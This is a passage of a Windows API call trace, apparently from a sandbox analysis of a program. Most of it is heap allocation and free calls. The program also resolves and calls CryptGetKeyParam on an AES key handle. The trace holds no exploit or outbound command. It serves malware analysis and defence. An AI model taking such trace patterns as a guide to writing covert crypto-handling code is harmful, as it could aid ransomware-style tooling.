0x68e030 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0077.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0077.146] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0077.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e018 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0077.147] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0077.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0077.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0077.148] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0077.149] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0077.149] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0077.150] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0077.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0077.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.151] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0077.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0077.152] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0077.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f96c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0077.153] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0077.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0077.153] CryptGetKeyParam (in: hKey=0x6b8af8, dwParam=0x7, pbData=0x6bb598, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb598*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0077.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0077.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.155] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a7b88 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0077.156] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.156] HeapFree (in: hHeap=0x650000, 